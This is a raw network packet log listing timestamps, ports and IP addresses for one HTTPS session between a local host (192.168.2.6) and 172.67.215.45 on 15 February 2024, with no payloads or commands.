Feb 15, 2024 19:42:26.930197001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.930243969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.930250883 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.930285931 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.930635929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.930651903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.930689096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.930695057 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.930716991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.930736065 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.931296110 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.931312084 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.931351900 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.931359053 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.931380033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.931396961 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.931912899 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.931930065 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.931974888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.931981087 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.932013988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.932512999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.932528973 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.932564020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.932571888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.932590961 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.932655096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.933140039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.933156967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.933188915 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.933196068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.933218956 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.933232069 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.933758974 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.933774948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.933814049 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.933819056 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.933851004 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.934398890 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.934417009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.934453011 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.934458971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.934490919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.935041904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.935060024 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.935092926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.935097933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.935117960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.935132980 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.935734034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.935750961 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.935786963 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.935792923 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.935826063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.936408997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.936425924 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.936461926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.936467886 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.936499119 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.937383890 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.937400103 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.937453032 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.937459946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.937493086 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.938059092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.938075066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.938114882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.938124895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.938163042 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.939205885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.939225912 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.939273119 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.939280987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.939316034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.939974070 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.939990997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.940037966 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.940045118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.940080881 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.940808058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.940824032 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.940870047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.940879107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.940913916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.941605091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.941625118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.941680908 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.941689014 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.941724062 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.942531109 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.942548990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.942593098 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.942600965 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.942637920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.943248034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.943265915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.943305969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.943312883 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.943348885 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.943989992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.944006920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.944062948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.944071054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.944108963 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.944597960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.944614887 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.944650888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.944658041 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.944675922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.944694996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.945271015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.945286989 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.945327997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.945334911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.945370913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.947280884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.947299957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.947338104 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.947344065 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.947365046 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.947379112 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.949928999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.949944973 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.949980974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.949995995 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.950011969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.950038910 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.952961922 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.952976942 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.953028917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.953053951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.953191996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.955193043 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.955209017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.955279112 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.955288887 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.955331087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.957973957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.957990885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.958031893 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.958039999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.958067894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.958093882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.960602999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.960618973 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.960665941 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.960673094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.960697889 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.960716009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.964338064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.964354992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.964402914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.964416027 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.964451075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.968835115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.968852043 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.968899965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.968924046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.968939066 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.968964100 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.973335981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.973357916 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.973417044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.973442078 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.973479986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.978228092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.978243113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.978293896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.978322029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.978338003 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.978354931 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.981545925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.981564045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.981622934 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.981643915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.981684923 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.984071016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.984087944 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.984148979 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.984162092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.984199047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.986576080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.986592054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.986646891 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.986658096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.986695051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.987226963 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.987243891 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.987298012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.987306118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.987344027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.987946033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.987962008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.987999916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.988008976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.988034964 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.988054991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.988231897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.988249063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.988296986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.988303900 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.988337994 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.988897085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.988914967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.988971949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.988980055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.989022970 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.989514112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.989531040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.989578009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.989588022 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.989620924 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990230083 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990248919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990283012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990293026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990314960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990328074 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990530968 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990547895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990582943 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990590096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990614891 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990624905 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.990932941 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990948915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.990993023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.991003990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.991039991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.991539955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.991555929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.991595984 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.991609097 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.991641045 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.992307901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.992324114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.992430925 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.992445946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.992477894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.992697001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.992712021 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.992741108 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.992749929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.992773056 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.992786884 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.993204117 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.993217945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.993254900 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.993264914 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.993280888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.993655920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.993700981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.993716955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.993752956 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.993760109 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.993779898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.993792057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.994060040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.994076967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.994107008 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.994116068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.994138956 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.994159937 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.995217085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.995234013 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.995274067 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.995285034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.995313883 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.995327950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.995686054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.995702028 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.995750904 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.995759964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.995795012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996125937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.996143103 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.996174097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996181011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.996206045 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996228933 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996633053 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.996649981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.996685028 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996690989 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.996718884 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996735096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.996994972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997014046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997044086 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997054100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997072935 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997114897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997524023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997540951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997582912 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997602940 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997638941 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997870922 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997894049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997921944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997931004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.997946024 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.997962952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.998378992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.998394966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.998437881 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.998450994 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.998460054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.998480082 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999114990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999130964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999174118 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999181032 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999207020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999229908 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999509096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999526978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999558926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999566078 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999593973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999612093 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.999965906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.999982119 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.000020981 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.000027895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.000057936 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.000080109 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.000468016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.000483036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.000520945 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.000528097 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.000546932 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.000566959 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.001074076 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.001091957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.001132011 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.001143932 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.001158953 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.001179934 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.001655102 CET	443	49722	172.67.215.45	192.168.2.6
